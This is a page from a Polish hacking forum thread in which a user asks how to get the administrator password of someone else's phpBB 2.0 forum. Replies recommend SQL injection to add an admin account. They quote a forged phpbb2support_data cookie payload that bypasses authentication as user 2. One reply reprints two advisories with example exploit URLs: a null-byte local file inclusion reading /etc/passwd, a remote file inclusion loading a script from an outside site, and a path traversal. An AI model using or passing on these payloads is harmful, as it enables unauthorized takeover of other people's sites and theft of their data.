Strona 1 z 4 123 ... OstatniOstatni
Pokaż wyniki 1 do 10 z 33

Temat: Wyciąganie hasła (phpBB)

  1. #1
    Zarejestrowany
    Jan 2007
    Postów
    10

    Smile Wyciąganie hasła (phpBB)

    Hej. Czy możliwe jest pozyskanie hasła administratora jakiegoś Forum opartego na phpBB 2.0? Z góry dziękuję za pomoc.

  2. #2
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    Na pewno ta... Jesli wygladasz tak jak na avatarze to nie powinnas miec z tym zadnych problemow :-)

    Tak na serio - phpBB do tych bezpiecznych nie nalezy moim zdaniem i wole go unikac wlasnie ze wzgledow bezpieczenstwa. Co do pozyskania hasla - zamiast wydobywac haslo prosciej bedzie je zmienic na swoje albo dodac usera z prawami admina uzywajac jakiegos SQL Injection, itd... wazne jaka jest wersja forum i czy jest podatne na atak...

  3. #3
    Avatar eMCe
    eMCe jest offline Emil Grzegorz Gubała
    Zarejestrowany
    Dec 2006
    Skąd
    Kielce
    Postów
    1,767

    Domyślnie

    2.0. dokładniej ;p
    <= 2.0.12 - bez problemu - stary bład

    http://www.cc-team.org/index.php?name=bugtraq&show=570


    http://www.haxite.org/index.php3?sit...ul_view&id=442
    tu moze troszke jaśniej


    nowsze - trzeba bugtraq czytać
    Agencja reklamy kielce (mały kilkudniowy case pozycjonerski )

  4. #4
    Zarejestrowany
    Jan 2007
    Postów
    10

    Domyślnie

    Mam problem. W instrukcji napisano:

    Naciskamy Replay i :
    Cookie: phpbb2support_data=a%3A0%3A%7B%7D
    Zastąp to a%3A0%3A%7B%7D tym
    a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22useri d%22%3Bs%3A1%3A%222%22%3B%7D
    Tylko, że po wciśnięciu tego Replay dostaję coś takiego:



    Jak widać nie ma tam tego, co mam zastąpić, a mianowicie: "phpbb2support_data=a%3A0%3A%7B%7D"

    Pomocy!

    PS: Używam Firefox'a.
    Ostatnio edytowane przez Zuzia : 01-27-2007 - 13:07

  5. #5
    Zarejestrowany
    Dec 2006
    Postów
    693

    Domyślnie

    jesliu masz wieksza znajmosc idz od goscia do domu na kawe i skopjuj poprostu ciasteczko

  6. #6
    Avatar eMCe
    eMCe jest offline Emil Grzegorz Gubała
    Zarejestrowany
    Dec 2006
    Skąd
    Kielce
    Postów
    1,767

    Domyślnie

    hihi skoro nie ma tego to najprawdopodobniej wersja jest nowsza niż 2.0.12 - wsumie to sie tym nie bawillem więc moze jest na sali ktoś kto sie bawił ta luką
    Agencja reklamy kielce (mały kilkudniowy case pozycjonerski )

  7. #7
    Zarejestrowany
    Jan 2007
    Postów
    10

    Domyślnie

    Cytat Napisał pirox Zobacz post
    jesliu masz wieksza znajmosc idz od goscia do domu na kawe i skopjuj poprostu ciasteczko
    Niestety nie mam mozliwosci pojsc do goscia na ciasteczka.

    Cytat Napisał eMCe Zobacz post
    hihi skoro nie ma tego to najprawdopodobniej wersja jest nowsza niż 2.0.12 - wsumie to sie tym nie bawillem więc moze jest na sali ktoś kto sie bawił ta luką
    Jak sprawdzić wersje forum?

  8. #8
    Zarejestrowany
    Dec 2006
    Postów
    693

    Domyślnie

    zle mnie zrozumiałas mi chodziło o jedzenie ciasteczek to tylko takie cos co zapisuje przeglondarka i jak sie goscoł logował na tym forum to wszystko idze do cisteczka (cookies)

  9. #9
    Zarejestrowany
    Jan 2007
    Postów
    10

    Domyślnie

    Cytat Napisał pirox Zobacz post
    zle mnie zrozumiałas mi chodziło o jedzenie ciasteczek to tylko takie cos co zapisuje przeglondarka i jak sie goscoł logował na tym forum to wszystko idze do cisteczka (cookies)
    Heh, doskonale Cię zrozumiałam mój drogi. Po prostu takie dwuznaczne zdanie złożyłam, celowo z resztą. Aż tak zacofana nie jestem. Pozdro.

  10. #10
    Avatar Sardihan
    Sardihan jest offline Blastmaster
    Zarejestrowany
    Dec 2006
    Skąd
    polsza
    Postów
    747

    Domyślnie

    bugtrack:
    phpBB 2.x Activity MOD Plus - File Inclusion Vulnerability

    Opracował: Paweł Jabłoński Data: 3.06.2006, 10:52


    phpBB-Amod (http://www.phpbb-amod.com/)
    Podatność wersji: 2.x
    Ryzyko: Bardzo wysokie

    Wykorzystanie tego błędu umożliwia zdalne załączenie arbitralne lokalnych plików do zmiennej phpBB.phpvv_root_path w /language/lang_english/lang_activity.p hp. Lukę znaleźć możemy w admin_hacks_list.php (linia 12).

    - Kod lang_activity.php -

    12: include_once($phpbb_root_path .'language/lang_'.
    $board_config['default_lang'] .'/lang_activity_char.'. $phpEx);

    - Koniec kodu -

    Jeśli zmienna "magic_quotes_gpc" jest wyłączona, atakujący może załączyć pliki wewnętrzne z wykorzystaniem zerowego końca znaku (0x00). Jeśli natomiast zmienna "allow_url_fopen" jest dostępna, atakujący może załączać zewnętrzne pliki z lang_activity.php.

    PRZYKŁAD_

    Powodzenie ataku wymaga włączonej zmiennej "register_globals".

    http://[hostname]/[phpBB]/ language/lang_english/lang_activity .php?phpbb_root_path=/etc/passwd%00

    (warunek: magic_quotes_gpc Off)

    http://[hostname]/[phpBB]/langu age/lang_english/lang_activity.php? phpbb_root_path=http://twoja_strona .pl/skrypt.txt

    (warunek: allow_url_fopen On)

    KONTAKT_

    e-mail: [email protected]
    website: http://www.nukedx.com


    Błąd wykrył: Mustafa Can Bjorn
    i
    phpBB 2.x admin_hacks - Local Inclusion Vulnerability

    Opracował: Paweł Jabłoński Data: 3.06.2006, 11:12


    phpBB (admin/admin_hacks_list.php)
    Podatność wersji: 2.x
    Ryzyko: Bardzo wysokie

    Wykorzystanie tego błędu umożliwia zdalne załączenie arbitralne lokalnych plików do phpBB.board_config[default_language] i zmiennej "phpEx" zawartej w admin_hacks_list.php. Luka znajduje się w admin_hacks_list.php (linie 30-37).

    - Kod admin_hacks_list.php-

    30: if( !empty($setmodules) )
    31: {
    32: include($phpbb_root_path . 'language/lang_' .
    $board_config['default_lang'] . '/lang_admin_hacks_list.' . $phpEx);
    33: $filename = basename(__FILE__);
    34: $module['General']['Hacks_List'] = $filename;
    35:
    36: return;
    37: }

    - Koniec kodu -

    PRZYKŁAD_
    Powodzenie ataku wymaga włączonej zmiennej "register_globals".

    http://[hostname ]/[phpBB]/admin/admin_hacks_list.ph p?setmodules= 1&board_config[default_lang]=english&phpEx=../../../../. ./../../../etc/passwd

    KONTAKT_

    e-mail: [email protected]
    website: http://www.nukedx.com


    Błąd wykrył: Mustafa Can Bjorn

    przyda sie również www.securiteam.com

Strona 1 z 4 123 ... OstatniOstatni

Podobne wątki

  1. Odpowiedzi: 15
    Autor: 02-09-2008, 22:18
  2. hasła bitowe
    By michalski007 in forum Hacking
    Odpowiedzi: 3
    Autor: 01-30-2007, 09:25
  3. Odpowiedzi: 4
    Autor: 01-02-2007, 16:30

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj